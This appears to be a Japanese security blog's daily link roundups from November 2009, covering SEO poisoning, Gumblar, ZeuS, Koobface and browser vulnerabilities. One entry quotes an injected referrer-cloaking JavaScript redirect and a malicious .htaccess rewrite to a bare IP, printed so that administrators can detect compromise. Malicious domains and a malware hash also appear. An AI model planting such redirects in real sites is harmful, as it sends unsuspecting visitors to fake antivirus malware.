UnderForge of Lack

明日はもう師走

聖アンデレ使徒 (St. Andrew's Day)
カメラの日 (1977年,世界初の自動焦点カメラ コニカC35AF発売の日)
本みりんの日「いい(11)みりん(30)」 (※さしすせそには入っていない)
シティズ・フォー・ライフの日 (死刑制度の廃絶の為に起こされる運動。)

----------
月曜朝なので、何もアリマセン

----------
MASS Hacking
一昨日のUnmask Parasiteの記事、BlackHat SEOが、正規を装ったBlogからReffererを悪用して、検索エンジンを経由した場合だけ全く関係ない場所に誘導しているという話ですが・・・どうやら思ったよりも深刻だったようです。

基点：
Tweet Week: Nov 23-29, 2009
Nov 28, 2009:

November 2009 (gs) Security Exploit Removal
Starting Nov 6, 2009, we received reports from some of our customers reporting a new php injection exploit affecting their sites.
Media Templeというホスティング会社のサイトのかなりの部分が、このインジェクション攻撃を受け、ユーザが全く認識しないままFakeAVの誘導攻撃の踏み台にさせられていた模様。
Media Temple, WordPress, Mass Hacking
About 10% of all (gs) users were affected.
総ユーザの10%のサイトがこの攻撃の影響下にあったと・・

Massive Badware Campaign Targets Google's "Long Tail"
コメントには他のホスティング会社でも同様のことが発生しているとしていますが、確認はできませんでした。
GENERIC CIALIS on my website? I think my site has been hacked!
自分が全く認識していないにもかかわらず、GoogleのSERP(検索結果）にのみ、「CIALIS(バイアグラのクローン)」と表示される！？

外向きWebを運用している人は、好むと好まざるとにかかわらず Google Webmaster Toolのアカウントは取得しておいたほうがよさそうです。

あと、パスワードを変更した後、元のパスワードに戻す人が非常に多いと警告されていますが・・・何のためのパスワード変更なのか理解していないのかもしれませんね（苦笑）
パスワード強制リセットの弊害かもしれませんが・・・

----------
オワッテル

予想以上にオワタ
asianmotors●co●in
見本市状態・・
ワザトやってんじゃないですかね？（笑）

追加で書かれている２つのサイトはどちらもセンセイ無視（片方は不審な動きとは検知してるようですが・・）
ちょっと嫌な感染拡大を続けていますね


しまったぁ！ GIF見損ねたぁ！


----------
くらうど！？
そういえば、IBMがクラウド、クラウド！とCMで連呼していましたが・・(英語版)
A Cloudy Weekend

Cloud Security Alliance (CSA)

クラウドというと、常に漠然としたセキュリティ不安がつきまとうわけですが・・・
あと、ISP27kもなんだかお金ばっかりかかる印象があったりします。
ISO27000シリーズ ISO/IES 27001

----------
Massive Koobface
MDL Updatelist
11/29がKoobFaceで洪水状態に・・・

----------
らんちょんみ～と

ZeuS back to facebook
Beware Weekend Facebook Scam! -- GarWarner
updatetool.exe 17 of 41
早朝(US)はまだ5ベンダしか反応していなかったそうですので、ZeuSに対する各セキュリティ会社の応対は比較的素早いようです。

----------
| 1259524832 | B | [goog-black-hash 1.45511 update] |
| 1259524810 | M | [goog-malware-hash 1.17548 update]
| 365406 |-1485(366891)
| 1060769 |
EoF

議会開設記念日 (1890年、初の帝國議会召集)
いい肉の日 「いい(11)にく(29)」
いい服の日 「いい(11)ふく(29)」
パレスチナ人民連帯国際デー(International Day of Solidarity with the Palestinian People)
大韓航空機爆破事件 (1987)

----------
あぼ～ん
たまに見かける「あぼーん」ですが、今日はじめて語源(A bone = corpse)を知ったので使ってみました（笑）
あぼ～んすべき会社のリスト by Symantec
List of Companies who supply spyware, adware, malware, keyloggers, trojans and other greynets
要するに 偽セキュリティソフトを「発売」している会社（本当に会社かどうかは？）のリストです。この辺の名前を見かけたら要注意ということで・・・

VirusBurstが２つあるぞ！とか思ったけど、人のミスってすぐ気がつくのに自分のミスは気がつかないんですよね～～

コメントにもかかれてますが、どの「会社」が出してるのがどの名称のトロイなのか、あるいは偽ソフトなのか紐付けもして欲しかったですね。

----------
CVE-2009-3033
そのSymantecですが、VUPENがなにやら警報を出しています。
Symantec Products ActiveX Remote Buffer Overflow Exploit (SYM09-016)
This remote code execution exploit takes advantage of a buffer overflow vulnerability in the "AeXNSConsoleUtilities.dll" ActiveX installed with various Symantec products.

一昨日レポした、コレだと思うのですが、どうも色々な製品に使われているActiveXらしく・・・
[sym09-016] Security Advisories Relating to Symantec Products - Symantec’s Altiris Deployment and Notification Management Web Console RunCmd Vulnerability
Symantecのサーバソリューションを使っている企業は、（たぶん既に何か言われているとは思いますが）念のためベンダもしくはサプライヤに問い合わせを行ってください。

Affected Product(s)

Product	Version	Build	Solution(s)
Symantec Altiris Deployment Solution	6.9.x	All	Apply Hotfix
Symantec Altiris Notification Server	6.0.x	All	Apply Hotfix
Symantec Management Platform	7.0.x	All	Apply Hotfix

----------
YouTubeに埋め込まれた警告
YouTubeに「詐欺動画」出現、警告に見せかけて特定サイトへ誘導
実際には、このメッセージはYouTubeが表示しているものではない。動画自体に埋め込まれている偽の警告メッセージ。メッセージ中に表示されたURLは、YouTubeとは無関係の、あるソフトウエアを販売するWebサイトである。
こ・・こんなのに釣られるのか！？
と思ったのですが、最近のHD Movieは実になめらかで、モスキートもあまり涌いてないため、だまされる人はだまされるかもしれません。

keyword:
AMA(アメリカン・ミュージック・アワード : American Music Awards of 2009
アダム・ランバート : なんか Kiss で有名？
ティト・オーティズ vs フォレスト・グリフィン プロレス？
ジェニファー・ロペス
このへんの映像には気をつけましょう・・ってことで。

----------
らんちょんみ～と

ZeuS(Facebook)
facebook.comの偽サイト -- Nov.28
121-83-181-122.eonet.ne.jp
国内感染者（というか散布者）が減りませんね・・・

----------
Tiger Woods spread ..
ウッズ選手が交通事故、軽傷か　妻が窓たたき割り救出
こういう時事ネタがあると必ず・・・・
Tiger Woods Car Accident Heating Up the Web
vir-curemypc-now.com
egafuki.cn
online-scanner-free.net

TechCrunch的視点：
インターネットが新聞やテレビを滅ぼす確証を今朝のタイガー・ウッズ事故報道にまざまざと見た

----------
GSV
グーグル・ストリートビューの法的問題を考える
読み物

----------
あぼ～ん2
11/27 update
264 malicious domains to update. Sources include www.dynamoo.com, freepcsecurity.co.uk, www.malwareurl.com:

----------
あぼ～ん3
Badwarebusters: Not a Safe Site?
I just went to badwarebusters.org in my sister’s computer (with Norton 360) and found a Norton Safe Web warning
（苦笑）

----------
| 1259438725 | B | [goog-black-hash 1.45439 update]
| 1259438694 | M | [goog-malware-hash 1.17524 update]
| 366891 | -389(367280) 微減傾向
| 1057786 |
EoF

税関記念日 (1872年、運上所の呼称を「税関」に統一)
太平洋記念日 (フェルディナンド・マゼランが、マゼラン海峡を通過)

----------
Black Hat SEO poisoning

SEOという言葉を知らないWEB屋さんはあまりいないと思いますが、SEO汚染の話はどうなんでしょう？
先日紹介した、正規blogが大規模なSEOスパムを発生させ、FakeAVへの誘導を行っているという記事 Google Search Results Significantly Poisoned の続報です。

Rogue blogs redirect search traffic to bogus AV sites. Part 1.
Rogue blogs redirect search traffic to bogus AV sites. Part 2.
このblogを使ったSEO汚染攻撃は、以下のようなスキームで成功しています。

1. 攻撃者は正規サイトのサブディレクトリにblogエントリを作成する
2. blogは各postが、Googleによる投稿タイトルでのSERP(検索結果）に、それぞれ5つの画像イメージの結果を返すように構成されている
3. 各blogのタイトルは、微妙にポピュラーではないキーワード（たとえば “blue mustang picture“, “upstate ny photos“, “pictures of 2008 cadillac“, “cinderella story pictures“, “fan remote wiring diagram“... など）を使用している。
4. これらのBlogポストそのものを直接見ても無害だが、Google上の検索結果をクリックすると、FakeAVのサイトにリダイレクトされる（それらは実際にはトロイの木馬だ）
5. すべてのblogは全く同じ構造をしており、Googleをターゲットにしてからずっと、容易に「検索」によって探し当てることが可能。たとえば、"allinurl:albums/bsblog/category" というキーワードでは 295,000ものヒットがある。

そして以下のようなスクリプトによって、検索エンジンを経由してきた（リファラーチェック）時だけ別の場所にリダイレクトされます。
if ( document.referrer && document.referrer != '' && (document.referrer.match(/msn/i) ||
document.referrer.match(/live/i) || document.referrer.match(/altavista/i) ||
document.referrer.match(/baidu/i) || document.referrer.match(/yahoo/i) ||
( document.referrer.match(/google/i) && (document.referrer.match(/imgres/i) ||
document.referrer.match(/search/i) || document.referrer.match(/blogsearch/i) ) ) )) {
if (top.location.replace) {
top.location.replace(url);
}
else {
top.location.href = (url);
}
こうして、GoogleBotにはMalware判断されない、リダイレクタが誕生しています。

もし、自分のサイトがこのようなリダイレクタの踏み台になっている場合、 .htaccess に以下のような記述があるかもしれません。
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]

対策は何度も言うように FTP を使用しないことにあります。
どうしてもFTPを許可しなければならない場合、TCPラッパによるアクセス制限を含めた管理アクセスが重要になるでしょう。
また、SFTP/SCPアプリケーションにパスワードを保存しないでください。

感染しているかも？と不安なサイト管理者は、全サーバ内のファイルから以下のキーワードをGREPし、オリジナルファイルにその記述が存在するかどうか確認してみるのが良いでしょう。
mdblog
bmblog
bmsblogs
bsblog
blog (このキーワードはあってもおかしくなさそうですが・・・)

----------
P3P
Illegal games? Pay the price - publicly!
Setup.exeが実行されると、特定のサイトから画像ファイル(.bmp)のダウンロードを試みます。この画像をベースに、ユーザの個人情報（フルネーム、ゲーム用のパスワード、電子メールアドレス、郵便番号、住所、性別、会社名、電話番号）を入力するように強要されます。このゲームをプレイしたいと必死な(desperately)人は、こうした（個人情報の入力）行為をオンライン上で行うことがどれほど危険、そして何度でも要求されるであろうことに思い至らず、急いで入力してしまうかもしれません。そして、その情報とともに自分のデスクトップの画面が、Web上にさらされていることに気がつくことになるでしょう。
これは恥ずかしい・・（苦笑）
Infostealer.Kenzero

Puppet様のとこで記事にされてたコレのことなのかな？
あれこれ
shareで落とした割れエロゲのsetup.exe踏んで個人情報が流出される:【2ch】ニュー速VIPブログ(`･ω･´)
↑のポスト内
ウイルスバスターがSetup.exeに反応
遅いよ・・・（笑）

MD5:0x7D69A51FD4E2C7E62B5F7AAADDD50B56
112.78.219.142 as users96.heteml.jp (現在は当該ドメイン停止中）

hetemlも災難だなぁ・・（せっかくロリポと域帯分割してるのに）
user96サーバの人は、移転を願い出たほうがいいかもですね。

----------
Norton？

Windowsロゴが出た後、真っ黒の画面にマウスカーソルだけ。はNortonが入っていても…。

「Gumblarウイルス」にも多層防御は有効、シマンテックが解説 -- 2009.05.26

安全神話なんか、紙よりも軽いものです・・

----------
SSH辞書攻撃Password
Do and don’ts for p@$$w0rd$
Trivia: One attacker tried more than 400,000 user name and password combinations.
そんなIPは塞いでしまいなさい！

l33tモードが強いのはもっともですが、日本人的には
Password = 8suwa-do とかにすると、まず英語圏のアタッカーにはわからないのでは？とか思っています（笑）
※あくまで例ですので、この文字列で攻撃しないでね

andrew/andrew って多いのかな？
WARDNA!?

----------
短縮URL対策
ブラック・フライデイ 2009

LongURL
TinyURLの逆ですね（笑）
FirefoxのAdd-on (LongURL Mobile Expander 2.0.0 )もあるようですので、Twitter愛好者の方は検討してみてください。

----------
Virus作成で就職活動
「初のiPhoneワーム」作者、アプリメーカーに就職へ

でじゃぶ：
Twitterに新たなワームの亜種出現、作者は17歳の少年？ -- 2009.04.20
ワームの亜種の出現と同じタイミングで、exqSoft Solutionsという会社がこの少年をWebアプリケーション開発者として採用したというニュースが報じられた。

----------
WebBrowser pierce Local Access
JavaScriptからローカルファイルシステムへのアクセスを可能にするFile API、標準化へ一
File APIを利用することで、たとえばローカルのテキストファイルを読み込んでテキストエリアにその内容を入力する、といった処理がクライアントサイドだけで実装できるようになる。また、セキュリティ的な問題を発生させないよう、フォームの＜input type="file"＞要素でユーザーが指定したファイルのみにアクセスできるような制限が課せられているとのこと。
File API
Firefox 3.6β4公開　ローカルファイル処理が可能に

セキュリティ的な懸念を払拭するために色々協議し、実装しても、その穴を突くものが現れるのがこの世界なので・・かといって、新技術を否定し続けるわけにも行かず・・・
利便と安全の天秤は今後も振れ続けるのでしょうか？

----------
らんちょんみ～と

NetGamerはMalwareの夢を見るか？
Spammer believes WOW users are sad lonely men.
そして、WOWのパスワードを盗まれます・笑

トワイライトの第２弾、NewMoonの映画公開が迫る中、プレビューを謳う詐欺サイトが増えている・・とか？
注意：WOTカード真っ赤なので注意してください↓
http://blogs.paretologic.com/malwarediaries/index.php/2009/11/27/new-moon/

----------
スパコン
長崎大学のスーパーコンピュータがIEEEの「ゴードン・ベル賞」（価格性能部門）を受賞
スパコン開発で「ゴードン・ベル賞」　長崎大助教ら受賞　「国内最速」安価で実現
3800万円！

一方、米陸軍は？
Sony still subsidizing US military supercomputer efforts
The US military has announced plans to buy 2,200 more of the game consoles, so that they can massively beef up the processing power of an existing, PS3-based supercomputer.

----------
Windows 8
『Windows 8』、2012年には登場か？
Windows 8、リリースは2012年予定
最近あんまりLinux陣営の動きが無いですよね・・

----------
Google
新聞に拒否されてもGoogleは痛くも痒くもない–という驚異の調査結果
そういえば、最近GoogleがTV-CMやってますね
さがそう。検索ワードでつくる30秒の｢検索ストーリー｣

----------
Wikipedia
Wikipediaの編集者、大幅に減少中
ふ～んとか思ってたけど
Wikipedia’s Volunteer Story
Wikimedia財団、Wikipediaの投稿者数減少に関する報道についてコメント
Wikipedia運営団体、「ボランティア編集者激減」の報道に反論

/.のコメントにもあるように、一部の恣意的な記事や、何度も間違いが書き戻される「サルカニ合戦」状態は見苦しいですよね[要出展]（笑）

----------
| 1259370066 | B | [goog-black-hash 1.45382 update]
| 1259370014 | M | [goog-malware-hash 1.17505 update]
| 367280 | -3764(371044)
| 1054892 |
EoF

Thanksgiving Day
更生保護記念日(更生保護の日は7/1
ノーベル賞制定記念日 (アルフレッド・ノーベルがノーベル賞創設のための遺言状を記した日)
いい鮒の日 「い(1)い(1)ふ(2)な(7)」

----------
そういうことをするから・・
IEの脆弱性をねらう攻撃コードがより強力に
オープンソースのセキュリティ検証フレームワーク「Metasploit」を開発しているハッカーらが、Internet Explorerに対する攻撃コードを進化させ、その有効性を高めようとしているようだ。

そういうことをするから、Malwareに "Thanks for H.D.Moore"とか書かれるんですよ（笑）
※MetaSploitはRapid7社に買収されています。
米Rapid7、脆弱性検証ツールの「Metasploit」を買収

----------
無料セキュリティソフト選 by cNet
Big changes in Security Starter Kit 2010

PCToolsの統合セキュリティ、「ThreatFire」が高く評価されているようですね。個人的には使ったことがありませんのでちょっと試してみようかな。

NoScriptが４なのは、きっと意味が理解できず削除するひとが多いからなのでしょう・・・

EnigMailは、ローカルに保存されるメールファイルを暗号化するもので、Thunderbirdの必須プラグインのひとつでしょう。

----------
IPA 見直し
事業仕分け結果（２６日）　
ＩＰＡの基金９０億円については売却や国庫返納を求めた。

独立行政法人交付金(2)（日本貿易振興機構、情報処理推進機構、石油天然ガス・金属鉱物資源機構、原子力安全基盤機構）
未踏ソフトウェアはスルー

IPAは例のダメージ以降、よくやってるとは思うんですが、JPCERTや各国CERTとの「連携」等がきちんと機能しているのか不安な面もあります。個人的には、感染サイトの強制テイクダウンなどを視野に入れた方向で各セキュリティベンダーとも連携をとってほしいです。

----------
1und1サーバに異常
openSUSE kernels on 1&1 root servers may be out of date
ドイツ・イギリスでデータセンターを展開している 1und1 が運用している OpenSUSEベースのrootサーバ群において、YaSTが無効化されているため、自動アップデートができず、脆弱性の残ったkarnelの状態でもう数ヶ月も稼動されている可能性があると警告されました。

1und1 使ってる顧客がいるんですが、どうにもなりませんね・・・
※ドイツ国内では圧倒的なシェアを誇っています

----------
ノートン先生も陥落？
Symantecの日韓ユーザー向けサイトに不正アクセス、情報漏えいはなし
Symantecは同社サイトに不正アクセスがあったことを確認した。調査中だが、情報漏えいなどの可能性はないとしている。
不正アクセスがあったのは日本と韓国のNortonユーザー向けにサポートを提供しているWebサイト。同サイトにSQLインジェクションの脆弱性があり、脆弱性を突かれてデータベースへ不正に侵入された。

貫入試験しておきますか？ by MetaSploit

また、アプリケーションベースの仮想化ソリューション "Altiris"にも脆弱性があった模様
Symantec patches Altiris solutions - again
Symantec Altiris ConsoleUtilities ActiveX Control "RunCmd()" Buffer Overflow
指標:4
使用中の方はアップデートしてください。

----------
らんちょんみーと

今日のおしながき：
Macromedia Flash Player 6
Early ecard Christmas malware cheers
※Macromediaは2005/12にAdobeに経営統合されています。
SANTA?
HO HO HO Santa has a virus for you
両方とも、IRC待ち受け型バックドアの亜種です。2008年頃の検体

Free turkey for all!
感謝祭ですしね～

ZeuS
Facebook botnet: Is your computer helping it?

Koobface aim Skype
“New Koobface Variant” Targets Skype
TROJ_VILSEL.EA
見知らぬ人からのコンタクトコールは回避しましょう。

----------
AS12604
AS12604

ウクライナのホストのようですが、なにやら大量に・・・
Oficla/Ofica と呼ばれるトロイの巣窟のようです。

----------
最近多すぎて、時間切れになることが多々・・ますます時間が不足しています。

Updates to my GREM Gold scripts and a new script
Network Forensics Puzzle Contest
※まったくわからなかった・・（泣）

若年層の「Twitter」認知度はわずか5％――モバゲータウン調べ
ふつうのブログvs.短文ブログ: Twitterの伸びは横ばいだがWordPressが急伸

Apple、Psystar への差止命令を裁判所に要請

セキュアブレイン、無料ウイルス対策ソフトの日本語版を公開
Introducing Immunet Protectの日本語版なのに、名前変えてるし・・

「おれがやる」――必然だったサンドボックスの搭載
Yarai

ダウンロードに潜む脅威、ユーザー心理に付け入るサイバー犯罪
by Symantec

ドイツではGoogle Analyticsの利用は個人情報の無断収集で有罪–政府は罰金刑を検討中
この記事の中でドイツの某法律家が、Google Analyticsを使ってビジターの利用パターンを調べているWebサイト一つあたり、罰金の額は最大で5万ユーロ（約75000ドル）ぐらいだろう、と言っている。
怖い・・ｶﾞｸﾌﾞﾙ

AviaryのChrome用エクステンションを試用: ブラウザがまったく遅くならないからすごいね
やっと来た～
FireBug & NoScript だけでもお願いします。 FireMobileSimulatorもできたら・・・

Rogue blogs regirect search traffic to bogus AV sites. Part 1.
Unmask Parasites の記事はよく読まないといけないんですが・・時間がありませんでした
普通のBlogコードへのインジェクションとその隠蔽、RogueAVへの誘導などの話。

---------
謝辞：
security warrior 様

ITPro様の記事ですが、Filterで書き換えを行えばよいのでしょうが、実際にはScriptをブロックすると全く機能しないサイトなどもあり、結局ホワイトリスト形式にするしかなくなります。
だいたい、TLDでブロックするとか、ありえないことが書かれていたので、ちょっと突っ込んでみました（笑）
※国全体ブロックをするなら、IPレンジで弾かないといけません。
国/地域別 IP アドレス割り当てリスト

ITPro様ともども、今後もよろしくお願いします。

----------
| 1259265626 | B | [goog-black-hash 1.45295 update]
| 1259265602 | M | [goog-malware-hash 1.17476 update]
| 371044 | -3038(374082)
| 1051029 |
EoF

ITProは好きなんですけど、たまにこーいうノイズが混じるのが難点かな
ウイルス感染をプロキシで防ぐ
はっきりいって、全く無意味かつ、誤解を招く記事で、少なくとも2009年11月の時点で記事にするべきではアリマセン。これは、10月頃から暴威を振るっているGumblar.Xには全く無縁の話です。時計が6ヶ月ほど遅れてるなら、NTPをチェックしたほうがいいと思いますよ

現在の Gumblar.X は、感染・散布・情報収集サイトのすべてが正規(legitimate)な陥落サイトで構成されており、.cnドメインや .lvドメインをブロックするのはナンセンスです。
参照：
Gumblar.x compromised site list
この論法なら、.com .info .net TLD もブロック対象ですね（苦笑）

顧客はその理由として，「ソフトウエア・ベンダーが提供する修正プログラムによって，業務システムが動かなくなる可能性がある」「適用するためにシステムを止めるのは不可能」「検証するための管理者のリソースが不足している」などを挙げる。こうした状況を理解せずに，ぜい弱性を放置しているような言い方は気に入らないということだ。
*shrug* 何かもう、コメントする気にもなれませんね。
対策を怠って Botに陥落した際の社会的信頼の失墜とかは計算しないんでしょうか？

世の中からBotが駆逐できない原因の一端を見た気がしました。

ペンの日 (日本ペンクラブ発足の日)
いい風呂の日 「い(1)い(1)ふ(2)ろ(6)」(入浴剤の業界団体「日本浴用剤工業会」制定)

----------
Microsoft Update for..?

Microsoft Updates requiring reboot
We(except Microsoft) were surprised by updates that required reboot.

MSXML XHTML のプロセスにアプリケーションを使用すると、冗長取得要求の W3C Web サーバーからの既知の DTD ファイルを Windows ベースのコンピューターに障害が発生する解析 XHTML を原因します。
[973685] Microsoft XML コア サービス 4. 0 SP3 用の更新
[973687] その他情報を更新します。
[973688] Microsoft XML コア サービス 4. 0 SP2 用の更新

タイムゾーン関連及び、日付表示の細かい修正
[976098] Microsoft Windows オペレーティング システムの 2009年 12 月の累積的なタイム ゾーン更新プログラム
[976470]「日付」範囲 out of エラー メッセージは、"日付と時刻] ウィンドウに表示されます。

W3C関連：
W3C's Excessive DTD Traffic -- 2008.2.8
Yet we receive a surprisingly large number of requests for such resources: up to 130 million requests per day, with periods of sustained bandwidth usage of 350Mbps, for resources that haven't changed in years.
DDoS状態・・・

----------
Internet Week 2009

秋葉原で開催中
H1 インターネットセキュリティ2009

Gumblar、中国のDDoS事情など「脅威のトレンド」振り返る
最後に2010年に向けた話題として、真鍋氏はWindows以外のOSにも注意が必要であること、また、サードパーティ製アプリのアップデートがMicrosoft Updateに統合されることが期待されるとした。
バルマーさん、本気で検討のほど、お願いしますよ～

----------
週間脆弱性 by Hitachi

チェックしておきたいぜい弱性情報＜2009.11.25＞
マイクロソフト2009年11月の月例セキュリティ・アップデート（2009/11/09）
Firefox 3.5.5リリース（2009/11/06）
Mac OS Xのセキュリティ・アップデート2009-006（2009/11/02）
■VMwareに複数のぜい弱性（2009/10/27）
■PHPで開発された複数のWebサイト用プログラムにぜい弱性

----------
うｐだて

Tool updates

WireShark 1.2.4
Truecrypt v6.3
Xplico v0.5.3
NetworkMiner v0.91
使ってるのは、WireSharkかなぁ・・

----------
Thunderbird 3 RC1

Thunderbird 3 RC1がリリース -- Mozilla Flux
Gmailとの統合を強化
送信済みメールやゴミ箱といったGmailの特殊なフォルダをよりよく認識し、統合するようになりました。これは英語版以外のGmailでも同様です。Thunderbirdは「すべてのメール」をアーカイブフォルダとして使用します。
はやくやってほしかった・・泣

----------
Your Name had embedded into PDF

User-generated PDF documents disclose private information - Update
PDF内に（ユーザ名を含んだ）フルパス名が含まれる話で、PowerPointでも同様のことが発生する模様です。
ドキュメント・プロパティの変更によってこのメタデータを保存しない設定にできるようですが、まだチェックしていません。
View or change the properties for an Office document - PowerPoint

----------
アクティブ・スクリプト？

Microsoft Internet Explorer に脆弱性
対策方法
2009年11月25日現在、対策方法はありません。

ワークアラウンドを実施する
対策版が公開されるまでの間、以下の回避策を適用することで、本脆弱性の影響を軽減することが可能です。

* アクティブスクリプトを無効にする
* DEP (Data Execution Prevention) を有効にする
聞きなれない用語ですが、JavaScriptを含む、いくつかのスクリプト言語のことを示しています。(VBScriptとか）
Flashの言語は「アクション・スクリプト」です。

New IE exploit - a good opportunity to upgrade to IE 8?
いい機会であることは事実ですが・・

GumblarもXP駆逐のためのインシデントだという穿った意見もあるようで・・

----------
びみょうに時間切れ：

Make Your Password Secure

無線LANでのクッキー乗っ取りが急増中，オンライン・ショッピングで要注意

Three apps we're thankful for

東京都、出会い系サイトの悪質な手口に注意呼びかけ～1千万円の被害例も
※どっかの出会い系喫茶のサイトがばっちり Gumblar'dでした・・・

Rogue Antivirus Optimized for Windows 7

Sony Ericsson Aino上の「モバイル セキュリティ」
残念ながら、iPhone用のアンチ・ウィルス製品は、どのベンダからも提供されていない。
　iPhone用のこのようなツールを制作するには、Appleの助力が必要だ。しかし、変更が加えられていないiPhoneに影響するワームは存在しないのだから、そうする必要はない（と彼らは考える）わけだ…

No Thanks Koobface

Malware Blocklist Nov25
The malware blocklists here are provided for free for noncommercial use as part of the fight against malware.
Please help to keep this site free! Donate whatever you can, all donations go to hosting and infrastructure costs.

Microsoft issues takedown notices over spilled COFEE

今日は多いんです・・

----------
謝辞

GEEKy Script Writer [perl and more!]の管理人様より、GumblarのRegEdit回避の丁寧な解説と相違点の指摘を頂きました。
勝手に記事引用しているにもかかわらず、訂正の解説まで頂きまして恐縮です。
今後もよろしくお願いいたします。

参照：
11月4日からのGumblarは何が変わったのか
よって、regedit.exeだけなく、他のレジストリエディタでもmidi9の隠蔽が行われると思われる。
実際にいくつかのレジストリエディタで確認したところ、上記(1)から(6)と同じ挙動が確認できた。

ProcMonもフック回避されるとなると手の打ちようがないのかなぁ・・とか思ったり。
※現在、個人の環境・ISPが無いため、会社のPCでGumblarのような剣呑な虫を飼育することができないんです（泣）
前のような実データを下にした解析ができないことをご了承くださいませ。

----------
| 1259179242 | B | [goog-black-hash 1.45223 update]
| 1259179203 | M | [goog-malware-hash 1.17452 update]
| 374082 | -2441 (376523)
| 1047858 |
EoF

OLの日
ハイビジョンの日 (総走査線：1,125)
憂国忌 (三島由紀夫の自決)
女性に対する暴力廃絶のための国際デー(International Day for the Elimination of Violence against Women)

----------
Confirmed IE6/7 Flaw

[977981] Internet Explorer の脆弱性により、リモートでコードが実行される

問題を緩和する要素:(の抄訳)
IE8: 何もしなくていい (Win7は最初から IE8)
IE7(on Vista): 保護モードはこの攻撃を緩和する（かもしれない）
Windows Server 2003/2008: Internet Explorer のセキュリティ強化の構成が有効になっていることを確認する。
その他：インターネット ゾーンのセキュリティ レベルを「高」に設定する。

Microsoft Internet Explorer mshtml.dll RCE
マイクロソフト、IE 6とIE 7にゼロデイ脆弱性の存在を確認
更新プログラムは現在開発中、「JavaScriptの無効化」で対応を
IE 7のゼロデイ脆弱性に攻撃コードが公開される

参考：
セキュリティ ゾーンの設定
無効だらけじゃないか！

私的な考察：
Microsoft/Adobe/Apple/SUN/Oracle/Mozilla といったベンダの最新情報に注意しましょう。

Firefox + NoScript の環境が今後も発生するであろうさまざまなXSSに対してもっとも有効な手段だと考えています。
Chromeプラグインの解禁が行われれば、そちらも視野に入るでしょう。
IE7を利用中の方は（IE8も動作するということですので）速やかに IE8への移行を考慮しましょう。
IE6を利用中の方は、環境が可能であれば IE8への以降を考慮しましょう。

IE6しか動作しない環境が絶対に必要だと信じている方は、徹底的なセキュリティ対策が必要です。
それが不可能であれば、当該環境のインターネットからの切断も考慮してください。
※Botに堕ちてしまう端末は、社会的に迷惑です。

----------
PDFの中にあなたのログイン名

あなたのWindowsログイン名は何ですか？
User-generated PDF documents disclose private information
[Full-disclosure] Millions of PDF invisibly embedded with your internal disk paths

IEのPDF Generaterによって吐き出されたPDFは、内部にユーザディレクトリのフルパス名を含んでいるというもの。Googleで検索すると数百万の単位で引っかかります。

もちろん、Full-Path名を知られたからどうということはないという方もいらっしゃるかもしれませんが、リモートログイン可能なPCの場合、ユーザ名を知られてしまうと、BluteForceでログインさせられてしまうかもしれません。

When tested by the heise Security team, the information was disclosed when combining IE8 with CutePDF, but PDF writers by Adobe (Distiller) and other vendors also caused the problem when used with the Microsoft browser. Firefox doesn't behave this way and only inserts the file name in the document title.

----------
DNSSEC Flawed

BIND Security Advisory (DNSSEC only)
BIND 9 Cache Update from Additional Section

DNSSECを有効にしているノードはまだ少ないでしょうが・・一応。

----------
つ・・つられないぞっ

Yahoo! JAPANのフィッシング、今月も大量発生中～釣られないためには
そのメール本当にYahoo! JAPAN？

----------
意識の無意識化

IT化による逆効果（かえって危険な点）に着目する
喉もと過ぎればなんとやら・・・という言葉もありますが、セキュリティ意識を保ち続けることが困難なのです。

----------
ランチョンミート

ZeuS
chase.comを騙るスパム
この攻撃、2009年を通して止まる気配がないですね。
chase.comの偽サイト -- Nov24.2009

----------
穴ぼこ

[IN ZERO DAY]
Firefox Sage Extension Cross-Context Scripting Vulnerability 指標:4
The vulnerability is confirmed in version 1.4.3. Other versions may also be affected.
Disable the extension until a fixed version is available.
Sage 1.4.3 : AFFECTED

PEAR Net_Ping Command Injection Vulnerability 指標:4
UPDATE TO 2.4.5
# pear upgrade net_ping
Net_Ping : Ver 2.4.5

----------
Googleセンセに尋ねてみよう

More Information about Malware Details
WebmasterToolsで見えるMalwareの情報がより詳しくなりました。
※そのまえに、マルウェア配布サイトの血色の警告を見ないことが重要ですが・・・

----------
評価

Windows 7発売から1か月、使い勝手はどう？
私はベータのころから使ってましたので概ね満足しています。一般企業の人に"Windows"が必要かどうか？という点に関してはびみょ（Linuxでも十分だと思う）ですが・・

XPモードの問題はこちらに目を通しておいたほうがいいでしょう：
Windows XP Mode とセキュリティ -- @a4lg の準技術的日記

----------
| 1259092842 | B | [goog-black-hash 1.45151 update]
| 1259092803 | M | [goog-malware-hash 1.17428 update]
| 376523 | +78(376445)
| 1043835 |
EoF

オペラ記念日
鰹節の日 「1（い）1（い）2（ふ）4（し）」
大分県地域ブログの日 (thru じゃんぐる公園)
東京天文台設置記念日 (国立天文台)
進化の日(Evolution Day) (1895年、チャールズ・ダーウィンがイギリスで「種の起源」を出版。)

----------
Opera

オペラの日ってわけでは無いのでしょうが（苦笑）、先日発見された穴を塞ぐセキュリティ・アップデートを含む、Opera10.10(Unity)が発表されました。
Opera 10.10 (Opera Unite) for Windows changelog

Advisory: Error messages can leak onto unrelated sites
Advisory: Heap buffer overflow in string to number conversion

尚、この脆弱性は６ヶ月前に発表された CVE-2009-0689 に起因するもので、KDE, Opera, SeaMonkey 及び K-Meleonにも同一起源の穴がある可能性を指摘されています。
Update: New security notes for KDE, Opera, SeaMonkey and K-Meleon
Mozilla:
Mozilla Foundation Security Advisory 2009-59 -- 2009.10.27

Opera patches 'extremely severe' security hole
Opera 10.10 closes "extremely severe" hole
Over time, it emerged that further libc implementations including OpenBSD, FreeBSD and Mac OS X were also affected. Updates have been released for OpenBSD 4.5, NetBSD 5.0 and FreeBSD 7.2/6.4.

PoCらしきものも出ていますので、Operaを使用中の方は 10.10にアップデートしましょう。（ついでにUniteが付いてきます・苦笑）
Opera Web Browser 'dtoa()' Remote Code Execution Vulnerability

----------
IE6/7

Exploit published for critical IE 7 zero-day flaw
Microsoft has not yet issued an advisory with mitigation guidance.

New critical vulnerability in Internet Explorer
